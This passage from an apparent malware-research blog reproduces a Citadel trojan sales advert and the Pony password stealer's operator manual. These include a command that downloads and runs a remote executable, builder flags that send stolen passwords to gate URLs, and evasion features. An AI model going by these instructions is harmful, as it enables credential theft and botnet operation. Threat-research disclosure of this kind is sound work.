Update to Citadel : v.1.3.4.5

June 10, 2012, 6:58 pm

≫ Next: Ransomware : Smile you're on camera - Reveton.C new landing pages

$

0

0

A new version of Citadel has been announced : v1.3.4.5 "Summer Edition"

Aquabox post on Exploit.in

Original text of the advert :

Новая летняя версия Citadel 1.3.4.5 Summer Edition готова порадовать ваших ботов своим присутствием и обильным функционалом.

Как видите, за последний месяц произошло много изменений, например вышел Chrome 19, старые версии начали попадать в ZeusTracker.

Поэтому пока одни сомневаются, другие зарабатывают и идут в ногу со временем, обналичивая очередной залив и улучшая свой софт :)
Изменений очень много, от глобальных до минимальных, все их здесь нет смысла писать, поэтому выделим самое основное, что пригодится в боевых условиях именно вам:

[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн. Комментарий подсвечивается при поиске в логах.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция antiemulation_enable 1/0 вынесена в конфиг.
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию. 
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в HTTP Header'ах, т.к она может мешать некоторым инжектам в работе (отвечает за фреймы на странице).
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m).
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделано возможное удаление .sol файлов при установке билда.
[+] Добавлен граббинг Accept-Language, Accept-Encoding в отчетах.


Новая версия в связи с измененным алгоритмом шифрования несовместима со старыми, поэтому ставим админку в новую директорию(+новую БД) и переносим ботов через команду user_executehttp://www.host.com/1345.exe. После переноса ботов, даем на старой админке команду bot_uninstall, чтобы деактивировать старую версию.
Опубликована новая версия мануала, рекомендуется перечитать его снова для усвоения новой информации по софту.
Размещаем заявки у support'a, выдача будет производиться если полностью уплачена арендная плата. Займет от 3 до 48 часов с момента размещения.
Выдача начинается в понедельник а 23.00.
Совсем скоро будет закрытие открытой продажи для всех и ввод системы покупки только через поручителей (текущих клиентов), поэтому те, кто писал по поводу демо-версии, поторопитесь с решением или придется искать поручителей.
Цены остались прежними, скидки только при покупке VIP-пакета. 

Google Translation :

The new version of the old Citadel 1.3.4.5 Summer Edition is ready to please your bot with his presence and rich functionality.

As you can see, over the past month there have been many changes such as Chrome came out 19, older versions are being released in ZeusTracker.
Therefore, while some doubt, others earn and keep pace with the times, cashing out the next bay and improving their software :)
Change very much from the global to the minimum, all of them there is no point in writing, so we select the most fundamental thing that is useful in combat for you:

[+] Added online preview screenshots from the admin. Screens are arranged in series in order of appearance, it is easy to switch back and forth keys are sorted. There is no point to download more pictures and watch one. Virtual Keyboard / pages can be seen consistently.
[+] Added otstuk history, you can view your stats otstuk botnet (the active, total, percentage) for a week, fortnight or month.
[+] Added the version history of software, you can see statistics on the Citadel updates in your botnet. Will you know how many bots taken over to the new version, and how much is left on the old. Draw a diagram.
[+] Ability to search log, only bots that are online.
[+] Ability to search across multiple logs of keywords at once, and they can be saved as an alias and not when you next enter the search again, simply choose from the list.[+] Added button "Cookies" in the context menu on the bot, which allows for the rapid withdrawal of all Cookies bot, if you do not cut off. Saves time.
[+] Integrated functionality to export FTP-accounts in the API, useful if you are using a third-party software-class FTP-Iframer, allows us to derive a plain-text/xml/php format ftp-acca on the date.
[+] Added button "Whois" to view the report, one click lets get all the information on the IP-address of the report.
[+] Added a comment to the bot when viewing the report, as well as the time when the boat was last online. Comment is highlighted when looking at the logs.
[+] Created a new section "Selected Records", which allows you to save a quick link to the desired report + nimu comment. For example, if you come across an interesting account, click "Add to Favorites" and a report will be displayed in a separate section, with automatic data Whois'om your comment. Keep acca on the spot.
[+] Added antiemulyator, which allows you to protect your botnet on the reversing and getting into trackers. When you start, build a detective that he was running in a virtual machine or a sandbox CWSandbox, VMware, Virtualbox, Sandbox, he starts to behave differently and your botnet go unnoticed. Details were not disclosed, tk's announcement is in the Public and the technology is very tricky.
Of the minuses: can not test the work in Vmware, have to do it on a real PC or Dedik.Option antiemulation_enable 1/0 is moved to the config.
[+] Added Bot status "Online / Offline" when viewing the report.
[+] One of the most important features: Preview report in the search logs. No need to open more than 200 windows in your browser to view each report, and each link. Now you can easily click on a preview to make a report, and if the report will be of interest, then view the full version.
Supported by the rapid switching between reports keys back and forth-ESC.[+] Updated cronjob script cleanup of old scripts (commands). Now everyone has to work without bugs.
[+] Added context menu option "Screenshots bot"
[+] Module VNC-admin: added sorting by date of last connection / OS (for example, if you only need to WinXP).
[+] Module log parser: added sorting by domain / number of reports in descending order.
[+] FTP-module ifreymer: Fixed bug with "smart" ifreymingom when the quotes in the code iframe-screened. The current owners are encouraged perezalit script pad.
[+] Since the previous encryption algorithm has been hacked a few months later, because of this, some customers got into ZeusTracker. We have developed and implemented a new encryption algorithm based on modified RC4. In cryptography uses a special key known only to the client. that requires its presence for decryption. Because each client's own indvidualny key, now from one client will not suffer all the rest. If you got one, others will be protected from this. Now we are completely isolated from the automatic analysis builds. As a result, we obtain the two-level authorization, protection from the boat trackers.
[+] Did cropping options X-Frame-Options in HTTP Header'ah, unnecessarily, it may interfere with some inzhekta work (responsible for the frames on the page).
[+] Be done to correct formgrabbinga / inzhektinga in Chrome 19 (19.0.1084.52m).
[+] Works faster on large botnets admin.interfeysa + gate expense of functional optimization GeoIP-database.
[+] Made possible removal. Sol files when you install this build.
[+] Added grabbing Accept-Language, Accept-Encoding in the reports.

The new version due to changes in the encryption algorithm is incompatible with the old, so we put in a new directory admin (+ new DB) and carry a team of bots user_execute http://www.host.com/1345.exe. Following the transfer of bots, we give the old admin team bot_uninstall, to deactivate the old version.
Published a new version of the manual, it is recommended to re-read it again for the assimilation of new information on the software.
Place the application in support'a, will be giving if fully paid the rent. It will take from 3 to 48 hours after placement.
Issue begins on Monday and 23.00.
Very soon will be closed to all public sales and commissioning of the system only through the purchase of the guarantors (current customers), so that those who wrote about the demo, hurry up with the solution or have to find sureties.
Prices remain the same, only the discount when purchasing VIP-package.
-----------------------------------------------------------------------------------------------------------
You may be interested by : Inside Citadel v1.3.4.5 C&C & Builder

---

Ransomware : Smile you're on camera - Reveton.C new landing pages

June 14, 2012, 9:58 am

≫ Next: Ransomware : Keep smiling ! You're on camera...again - Tobfy new landings

≪ Previous: Update to Citadel : v.1.3.4.5

$

0

0

Reveton is since few days being spread in a new version tagged by Microsoft as revision C.
To be more persuasive in the ransom process there is now a "video recording : On" feature.
See:

Reveton.C US Landing

 And some more for the love of Ransom Art !

Reveton.C FR Landing

Reveton.C DE Landing

Reveton.C UK Landing

Reveton.C IT Landing

Reveton.C ES Landing

Reveton.C GR Landing

Reveton.C FI Landing

Reveton.C NL Landing

You'll find all Reveton screenshots on https://www.botnets.fr/index.php/Reveton

Requested for md5: 
669b9fa908a221a41f52429f6b6a3d75
0c696a00e61b7ca0cec09f737cbfbce4

If you hear about other localised version of the landing, please drop a comment ! :)

Ransomware : Keep smiling ! You're on camera...again - Tobfy new landings

June 20, 2012, 1:08 pm

≫ Next: Redkit - one account = one color

≪ Previous: Ransomware : Smile you're on camera - Reveton.C new landing pages

$

0

0

Following Reveton's move, it's now Tobfy which is including Camera feature (Flash Plugin)...and a default landing page trying to mimic Interpol.

See:

Tobfy.B Default Landing

Tobfy.B FR Landing

Tobfy.B UK Landing

Tobfy.B AT Landing

Tobfy.B DE Landing

 I used to talk about art in ransom landing...and avoid comments as much as possible...but wow, this one is ugly. Please white background or clean borders... and hire a graphist...

Check Botnets.fr to get all known landing for Tobfy.

Redkit - one account = one color

June 22, 2012, 9:49 am

≫ Next: Inside Pony 1.7 / Fareit C&C - Botnet Control Panel

≪ Previous: Ransomware : Keep smiling ! You're on camera...again - Tobfy new landings

$

0

0

There is brain behind the Redkit Exploit Kit.
After first publication of Screenshots they added above the menu, the account ID in #fefefe on #ffffff
Invisible to human, cristal clear for photoshop.

Redkit "Customer" Panel (begining of may)

After public post and being named Redkit they gone #333333

Redkit after going #333333

Know now that there is one color by "Customer". Seems it's kind of Grey. Maybe #333333 + salt based on the ID of the user.

You publish a screenshot ? you give the account you just used and you'll get a nice :

Ваш аккаунт временно заблокирован. Пожалуйста, обратитесь в саппорт за дополнительной информацией.

next time you try to login. Translated by google as :

Your account has been suspended. Please contact support service for more information.

Well done.

Inside Pony 1.7 / Fareit C&C - Botnet Control Panel

June 26, 2012, 6:16 pm

≫ Next: Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel

≪ Previous: Redkit - one account = one color

$

0

0

Farmville Pony Icon

Client recognized by Microsoft as : PWS:Win32/Fareit

Pony 1.7 Login Screen

Pony 1.7 Home Screen

Pony 1.7 FTP Grabber

Pony 1.7 Http Grabber

Pony 1.7 Statistics

Pony 1.7 Reports

Manage

Error Logs

Domains

Others

Here is the description found in the "Help" Menu :

Система сбора FTP паролей "Pony"

Задача и цели проекта

• Сбор FTP паролей из 81+ популярных FTP-клиентов и Web-браузеров с зараженных компьютеров
• Незаметная работа приложения для пользователя
• Минимальный размер и время работы граббера на зараженном компьютере

Общая информация

Проект разбит на 3 отдельные части:

• Клиент "Pony.exe" - программа которую необходимо прогружать на компьютеры, она собирает и отсылает пароли на сервер.
• Билдер (PonyBuilder.exe) - набор программ для создания билда-клиента "Pony.exe". Билд собирается автоматически с помощью компилятора masm32, который включен в комплект.
• Набор серверных PHP скриптов - панель администратора, а также скрипт-гейт (gate.php) на который отправляются пароли.

Для сбора паролей используется нестандартный подход

При запуске клиента "Pony.exe" автоматически собираются пароли и данные, необходимые для дешифровки в специальные файлы-контейнеры, называемые "отчетами" (reports), после чего в зашифрованном виде передаются на сервер, где обрабатываются. Каждый отчет может содержать десятки и даже сотни паролей, а также прочую вспомогательную информацию.

Фактически, "Pony.exe" не содержит в себе никаких алгоритмов дешифровки, а лишь простые функции чтения данных файлов и реестра.

Всю работу по дешифровке паролей берет на себя Web сервер, это не ресурсоемкая операция, т.к. большинство алгоритмов тривиальны, сервер в среднем тратит меньше 10мс (0.01 сек) на обработку отчета с паролями.

Положительные стороны такого подхода:

• Минимальный размер прогружаемого файла "Pony.exe"
• Минимальное время работы на зараженном компьютере, в среднем, не превышает 1й секунды
• Если какой-либо FTP клиент обновил только алгоритм шифрования, но хранит файлы с паролями также как и раньше, что характерно для большинства популярных FTP-клиентов, то нет необходимости заново создавать билд и прогружать его, а лишь внести соответствующую модификацию в PHP скрипте
• Нет шанса допустить ошибку в алгоритме дешифровки пароля и потерять FTP, отчеты на сервере можно обработать заново, после исправления бага

Отрицательные:

• Необходим полноценный настроенный Web сервер для дешифровки паролей, с некоторыми специфическими требованиями
• Увеличенный трафик к серверу, для этого добавлена возможность паковать отчеты

Требования к Web серверу

• Apache/nginx
• PHP 5.2+
• MySQL
• Обязательные расширения для PHP
  • zlib - библиотека для сжатия/распаковки данных методом deflate
  • libxml - библиотека для быстрой обработки XML файлов
  • mysql - расширение для работы с базой данных MySQL
  • mhash - библиотека с хеш-алгоритмами (входит в основную сборку PHP 5.3+)
  • mcrypt - библиотека с алгоритмами шифрования
  • gmp - математическая библиотека для работы с большими числами
  • iconv, mbstring - расширения для конвертации multibyte (UTF-8, ...) строк
  • gd - графическая библиотека, используется для построения графиков
  • curl - расширение для работы с сетью
  • pcre - библиотека алгоритмов для работы с регулярными выражениями
  • json - библиотека для декодирования JSON строк
  • zip - библиотека для работы с zip архивами
• Необязательные расширения для PHP
  • sqlite3 - необходим как класс (PHP 5.3+), или как драйвер PDO (PHP 5.2+), иначе некоторые пароли дешифрованы не будут

Набор серверных скриптов не привязан к корневой папке и может быть перемещен в любую вам удобную. В рабочей папке необходимо создать директорию "temp" и дать ей права на чтение, запись и исполнение (chmod 777). Название папки "temp" можно переопределить в файле настроек "config.php".

Пример сборки PHP:
Configure Command './configure' '--enable-mbstring=all' '--with-zlib' '--with-iconv' '--with-gd' '--with-curl' '--with-pcre-regex' '--with-gmp' '--with-mhash' '--with-mcrypt' '--with-mysql' '--with-libxml-dir' '--prefix=/opt/php' '--with-sqlite3' '--with-freetype-dir' '--enable-gd-native-ttf' '--with-png-dir' '--with-jpeg-dir' '--enable-zip'.

Серверная часть (админка)

Комплект поставки:

• Файл "config.php" - содержит базовые настройки необходимые для корректной работы PHP скриптов админки. Внутри файла необходимо прописать параметры MySQL сервера, выбрать пароль для дешифровки отчетов, указать папку для работы с временными файлами.
• Файл "setup.php" - скрипт автоматической установки, необходимо запустить для первичной настройки панели администратора, после чего можно удалить. Этот скрипт создает необходимые таблицы MySQL, устанавливает логин и пароль администратора. Перед запуском "setup.php" следует прописать параметры MySQL сервера в файле "config.php". Чтобы повторить автоматическую настройку панели, нужно сперва удалить все таблицы с префиксом "pony_" из базы данных MySQL.
• Файл "gate.php" - скрипт-гейт, который принимает отчеты с паролями от "Pony.exe".
• Файл "admin.php" - основной управляющий скрипт панели администратора.
• Папка "temp" - папка для работы с временными файлами и шаблонами Smarty, необходимо установить права на чтение, запись и исполнение (chmod 777).
• Папка "includes" - набор вспомогательных файлов.

Функции админки

• Главная - общая информация о текущей работе сервера.
• Список FTP - здесь можно скачать или очистить списки полученных FTP/SFTP.
• Другие - здесь можно скачать или очистить списки полученных сертификатов.
• Статистика - текущая статистика по собранным данным, необходимо учесть, что очистка списка FTP/отчетов обнулит статистику.
• Домены - на этой странице можно добавить резервные домены граббера для оперативной проверки на доступность.
• Логи - здесь можно увидеть критические ошибки и уведомления сервера.
• Отчеты - список текущих отчетов с паролями.
• Управление - настройки сервера, а также управление учетными записями.
• Помощь - файл помощи.
• Выход - завершить работу с админкой.

Разграничение прав пользователей админки

Пользователи делятся на два типа:

• Администратор (admin) - может делать абсолютно все: удалять/добавлять новых пользователей, менять настройки сервера (пароль шифрования отчетов), менять привилегии/пароли других пользователей, очищать списки с паролями. Администратор может быть только один.
• Пользователь (user) - в зависимости от привилегий может либо только просматривать данные (user_view_only), либо просматривать и чистить списки FTP/SFTP/отчеты/логи (user_all). Пользователь может изменить свой пароль. Пользователь не увидит дополнительный функционал, доступный лишь администратору.

Дополнительная информация

• Каждый получаемый отчет содержит в себе дополнительную информацию:
  • OS - версия операционной системы Windows.
  • IP - IP адрес отправителя.
  • HWID - уникальный идентификатор пользователя, не меняется со временем. По этому идентификатору можно найти все отчеты с определенного компьютера.
  • Privileges - с какими правами (User/Admin) был запущен процесс "Pony.exe".
  • Architecture - x86/x64 архитектура микропроцессора, на котором был запущен процесс "Pony.exe".
  • Version - версия клиента "Pony.exe".
• Очистка списка отчетов и FTP/SFTP обнуляет статистику (диаграммы и текстовые данные).
• Одинаковые отчеты с паролями в базу данных не импортируются, если будет получен дубликат, в логах появится соответствующее уведомление.
• Импорт отчетов с паролями через "gate.php" происходит в два этапа:
  • Полученный отчет импортируется в базу данных MySQL. Только при успешном импорте в БД гейт вернет положительный ответ клиенту "Pony.exe" для предотвращения отсылки паролей на следующие (резервные) домены.
  • Отчет обрабатывается (парсится), после чего найденные FTP добавляются в БД, а отчету прописывается статус "обработан".
  Если отчет получил статус "не обработан", значит либо сервер перегружен (превышено максимальное время работы скрипта), либо при парсинге скрипт вылетел с критической ошибкой. В любом случае, отчет потерян не будет.
• Если системой пользуются несколько пользователей, необходимо заходить под разными аккаунтами, иначе будет постоянно всплывать окно авторизации.
• После очистки списков, данные в БД MySQL не всегда удаляются физически (особенно это касается логов), поэтому необходимо периодически запускать оптимизацию (сжатие) таблиц.
• Оптимизацию (сжатие) таблиц MySQL лучше производить, когда нет большой нагрузки на базу данных, т.е. клиент "Pony.exe" не шлет активно пароли.

Билдер "PonyBuilder.exe"

Задача билдера - настроить и скомпилировать клиент "Pony.exe", который необходимо прогружать на зараженные компьютеры.

Комплект поставки:

• Папка "masm32" - компилятор Microsoft Macro Assembler (MASM).
• Папка "PonySrc" - исходный код на языке MASM программы-клиента (граббера) "Pony.exe".
• Папка "BuilderSrc" - исходный код на языке Delphi 7 вспомогательной программы-билдера "PonyBuilder.exe".
• Файл "PonyBuilder.exe" - программа-билдер для клиента "Pony.exe".
• Файл "Help.txt" - файл помощи.
• Файл "build.bat" - скрипт используемый билдером для компиляции билда из исходников "PonySrc".
• Файл "Pony.ico" - иконка прикрепляемая к "Pony.exe" при компиляции, если в билдере выбрана соответсвующая опция.

Интерфейс разделен на 4 закладки:

• Билдер
  • Текстовое поле "Список доменов для отправки паролей" - здесь можно прописать список URL гейтов для отправки паролей. Каждая строка - отдельный URL, к примеру: http://somedomain.com/dir/gate.php Можно добавить неограниченное количество строк (URL), один и тот же URL можно добавить несколько раз. Домен может содержать информацию о порте подключения, к примеру: http://privatedomain.com:8080/gate.php. Протокол https:// на данный момент не поддерживается.
    "Pony.exe" будет пытаться подключиться и отправить отчет с паролями по списку, если данные будет успешно доставлены, программа немедленно завершит работу без попыток подключения к остальным URL.
  • Кнопка "Выбрать иконку" позволяет установить иконку для компилируемого файла, поддерживается только формат *.ico.
  • Кнопка "Создать билд" компилирует файл "Pony.exe" с заданными настройками.
• Лоадер
  • Простой лоадер (загрузчик файлов). После сбора паролей с указанных линков (URL) будут загружены и запущены файлы. URL задаются таким же образом, как и список доменов для отправки паролей. В нижней части закладки можно задать следующие опции:
    • Активировать лоадер - включить работу лоадера, иначе файлы загружаться не будут.
    • Не запускать одинаковые файлы дважды - после успешного запуска скачанного файла в реестр будет добавлено контрольное значение (хеш) данных файла, после чего, при повторной загрузке, дубликат запущен не будет.
• Настройки
  • Для того, чтобы увидеть все настройки, нужно активировать опцию "Показать продвинутые настройки" в главном меню.
  • Сжимать - сжимать отчеты с помощью библиотеки aPLib, прибавляет около 5Кб к размеру исполняемого файла, хорошо пакует текстовые данные перед отправкой, настоятельно рекомендуется использовать, сильно снижает трафик к серверу.
  • Шифровать - шифровать отчеты алгоритмом RC4.
  • Пароль шифрования - пароль, которым шифруются отчеты, аналогичный пароль необходимо установить в настройках сервера.
  • Сохранять отчеты на диск (для отладки) - при запуске "Pony.exe", после того как были собраны пароли, в той же папке где был запущен исполняемый файл, будет создан файл "out.bin", это контейнер с паролями в таком виде, в каком он отправляется на сервер для последующей обработки (дешифровки).
  • Отсылать пустые отчеты (для статистики) - обычно, если ни одного пароля не найдено, клиент "Pony.exe" ничего отправлять серверу не будет, но иногда полезно включение данной опции для получения статистики о количестве успешных запусков "Pony.exe".
  • Режим отладки - снимает перехватчик исключений, использовать исключительно в целях отладки.
  • Отсылать только новые отчеты - если опция не активирована, тогда дублирующие отчеты с паролями отсылаться не будут.
  • Самоудаление - запущенный файл "Pony.exe" будет удален после того как завершит свою работу.
  • Добавить иконку - прикрепить выбранную иконку к компилируемому файлу.
  • Паковать билд с помощью UPX - сжать исполняемый файл "Pony.exe" после компиляции.
  • Количество попыток отправить отчет - сколько раз пытаться отправить отчет при неуспешной передаче, рекомендуется указать минимум 2 попытки.
  • Вариант сборки:
    • Exe-файл - обычный исполняемый файл Windows (*.exe)
    • Dll-файл - вариант сборки в виде .dll библиотеки, она абсолютно автономна, для отработки необходимо вызвать из вашего проекта лишь API-функцию LoadLibrary(), т.е. URL для отправки паролей и все настройки вшиваются в сам .dll файл. В папке DllTest лежит простой пример использования-тестирования, в эту же папку необходимо положить файл Pony.dll, после чего запустить файл DllTest.exe, который в свою очередь вызывает LoadLibrary() для .dll библиотеки.
  • В списке "Доступные модули дешифровки" можно исключить из билда ненужные дешифровщики паролей, это уменьшит размер билда.
• Скин
  • На этой закладке можно выбрать понравившийся скин (шкурку) билдера.

Запуск билдера с командной строки

Доступны следующие аргументы командной строки билдера:

• -PACK_REPORT - сжимать отчеты
• -ENCRYPT_REPORT - шифровать отчеты, если пароль шифрования не задан, то по умолчанию будет указан "Mesoamerica"
• -REPORT_PASSWORD= - пароль шифрования, к примеру: -REPORT_PASSWORD=Mesoamerica
• -SAVE_REPORT - сохранять отчеты на диск (для отладки)
• -ENABLE_DEBUG_MODE - режим отладки
• -SEND_MODIFIED_ONLY - отсылать только новые отчеты
• -SELF_DELETE - активировать самоудаление
• -SEND_EMPTY_REPORTS - отсылать пустые отчеты
• -ADD_ICON - прикрепить иконку из файла Pony.ico
• -UPX - паковать билд с помощью UPX
• -DOMAIN_LIST= - список доменов, каждый домен должен быть разделен с помощью спец. символа \n, к примеру: -DOMAIN_LIST=http://host.com/gate.php\nhttp://host2.com/x/gate.php
• -LOADER_LIST= - список URL для лоадера (будет активирован автоматически при наличии URL), каждый URL должен быть разделен аналогично DOMAIN_LIST
• -LOADER_EXECUTE_NEW_FILES_ONLY - не запускать одинаковые файлы дважды
• -DISABLE_MODULE= - исключить из билда определенный модуль дешифровки (все названия модулей можно увидеть в файле PonySrc\FTPClients.asm), к примеру: -DISABLE_MODULE=MODULE_OPERA
• -DLL_MODE - использовать метод сборки в виде Dll-библиотеки
• -COLLECT_HTTP - дополнительно собирать и HTTP/HTTPS пароли
• -UPLOAD_RETRIES=N - количество (N) попыток отправить отчет, если значение не указано, то по умолчанию используются 2 попытки

Клиент "Pony.exe"

Задача "Pony.exe" - собрать пароли с компьютера и отправить их на сервер для последующей обработки.

Работает на всех версиях Windows, начиная с Win98, включая серверные. Поддерживается работа в режиме x86 и x64. Программа нормально отрабатывает при запуске с правами администратора или пользователя.

Перед распространением файл желательно почистить и криптануть.

Реализована мгновенная дешифровка сохраненных паролей для следующих программ:

• System Info
• FAR Manager
• Total Commander
• WS_FTP
• CuteFTP
• FlashFXP
• FileZilla
• FTP Commander
• BulletProof FTP
• SmartFTP
• TurboFTP
• FFFTP
• CoffeeCup FTP / Sitemapper
• CoreFTP
• FTP Explorer
• Frigate3 FTP
• SecureFX
• UltraFXP
• FTPRush
• WebSitePublisher
• BitKinex
• ExpanDrive
• ClassicFTP
• Fling
• SoftX
• Directory Opus
• FreeFTP / DirectFTP
• LeapFTP
• WinSCP
• 32bit FTP
• NetDrive
• WebDrive
• FTP Control
• Opera
• WiseFTP
• FTP Voyager
• Firefox
• FireFTP
• SeaMonkey
• Flock
• Mozilla
• LeechFTP
• Odin Secure FTP Expert
• WinFTP
• FTP Surfer
• FTPGetter
• ALFTP
• Internet Explorer
• Dreamweaver
• DeluxeFTP
• Google Chrome
• Chromium / SRWare Iron
• ChromePlus
• Bromium (Yandex Chrome)
• Nichrome
• Comodo Dragon
• RockMelt
• K-Meleon
• Epic
• Staff-FTP
• AceFTP
• Global Downloader
• FreshFTP
• BlazeFTP
• NETFile
• GoFTP
• 3D-FTP
• Easy FTP
• Xftp
• FTP Now
• Robo-FTP
• LinasFTP
• Cyberduck
• Putty
• Notepad++
• CoffeeCup Visual Site Designer
• FTPShell
• FTPInfo
• NexusFile
• FastStone Browser
• CoolNovo

Google Translation :

Collection system FTP passwords "Pony"

Purpose and Objectives of the project

Collection of FTP passwords of 81 + popular FTP-client and Web-browser with the infected computers

Invisible to the user's application

The minimum size and time of the grabber on the infected computer

General information

The project is divided into three parts:

Client "Pony.exe" - a program that needs to be progruzhat on computers, it collects and sends passwords to the server.

Builder (PonyBuilder.exe) - a set of programs to create a build-client "Pony.exe". Build collected automatically by the compiler masm32, which is included in the kit.

A set of server-side PHP script - admin panel, as well as script-gate (gate.php) on which to send passwords.

In order to collect passwords used an unusual approach

When you run the client "Pony.exe" automatically collected passwords and data required to decrypt files in a special container called "reports" (reports), and then encrypted to the server, where they are processed. Each report can contain tens or even hundreds of passwords, as well as other supporting information.

In fact, "Pony.exe" does not contain any decryption algorithms, but only a simple function to read data files and the registry.

All work on deciphering the password takes on a Web server, it is not resource-intensive operation, because Most algorithms are trivial, the server spends on average less than 10 ms (0.01 seconds) to process the report with passwords.

Positive aspects of this approach:

The minimum size of the file progruzhat "Pony.exe"

The minimum time on the infected computer, on average, less than a second 1st

If an FTP client just updated the encryption algorithm, but also stores files with passwords as well as before, which is typical for the majority of popular FTP-client, there is no need to re-create and build progruzhat it, but only to make the appropriate modifications to the PHP script

No chance of a mistake in the algorithm decryption password and lose FTP, reports can be processed on the server again, after fixing a bug

Negative:

Requires a full-fledged Web server is configured to decrypt the password, with some specific requirements

Increased traffic to the server, this adds the ability to pack records

Requirements for the Web server

Apache / nginx

PHP 5.2 +

MySQL

Required extensions for PHP

zlib - Library for compression / decompression of data using deflate

libxml - library for fast processing of XML files

mysql - the extension to work with the MySQL database

mhash - with a library of hash algorithms (included in the main assembly PHP 5.3 +)

mcrypt - with a library of encryption algorithms

gmp - a mathematical library for working with large numbers

iconv, mbstring - extension for converting multibyte (UTF-8, ...) lines

gd - a graphics library that is used for plotting

curl - the extension to work with the network

pcre - a library of algorithms for working with regular expressions

json - JSON library for decoding strings

zip - Library for handling zip archives

Optional extension for PHP

sqlite3 - is required as the class (PHP 5.3 +), or as a driver PDO (PHP 5.2 +), or some decrypted passwords will not be

A set of server-side scripting is not tied to the root folder and can be moved anywhere you want. In the working folder, you must create the directory "temp" and give it a read, write and execute (chmod 777). Name the folder "temp" can be overridden in the configuration file "config.php".

Example of assembly PHP:

Configure Command '. / Configure' '- enable-mbstring = all' '- with-zlib' '- with-iconv' '- with-gd' '- with-curl' '- with-pcre -regex '' - with-gmp '' - with-mhash '' - with-mcrypt '' - with-mysql '' - with-libxml-dir '' - prefix = / opt / php ' '- with-sqlite3' '- with-freetype-dir' '- enable-gd-native-ttf' '- with-png-dir' '- with-jpeg-dir' '- enable- zip '.

The server side (admin panel)

Scope of supply:

The file "config.php" - contains the basic settings required for the performance of PHP scripts admin. Inside the file, you must register your MySQL server settings, choose a password to decrypt the report, specify the folder for temporary files.

The file "setup.php" - automatic installation script, you need to run the initial configuration of the admin panel, then you can remove it. This script creates the necessary tables MySQL, set the login and password. Before running the "setup.php" should set the parameters of MySQL server in the file "config.php". To repeat the automatic tuning of the panel, you must first remove all the tables with the prefix "pony_" from the database MySQL.

The file "gate.php" - script-gate, which receives reports from the password "Pony.exe".

The file "admin.php" - the main manager of the script admin panel.

The folder "temp" - the folder for temporary files and templates, Smarty, you must install the right to read, write and execute (chmod 777).

The folder "includes" - a set of supporting files.

Admin functions

Home - General information about the ongoing work of the server.

List of FTP - here you can download or clear the lists obtained by FTP / SFTP.

Others - you can download or clear the lists received certificates.

Statistics - current statistics on the data collected, it is necessary to take into account that the cleaning list FTP / reset the statistics report.

Domains - on this page, you can add a backup domain grabber for the operational test for accessibility.

Logs - here you can see a critical error and notification server.

Reports - Reports a list of current passwords.

Management - server settings, as well as account management.

Help - help file.

Exit - exit from the admin panel.

Differentiation of user admin

Members are divided into two types:

Administrator (admin) - can do everything: delete / add new users, change the server settings (password is encrypted reports), change the privileges / passwords of other users, clear the lists of passwords. The administrator can only be one.

User (user) - depending on the privileges can either just view the data (user_view_only), or view lists and clean FTP / SFTP / reports / logs (user_all). User can change your password. The user will not see the additional functionality that is available only administrator.

Additional information

Each received a report contains additional information:

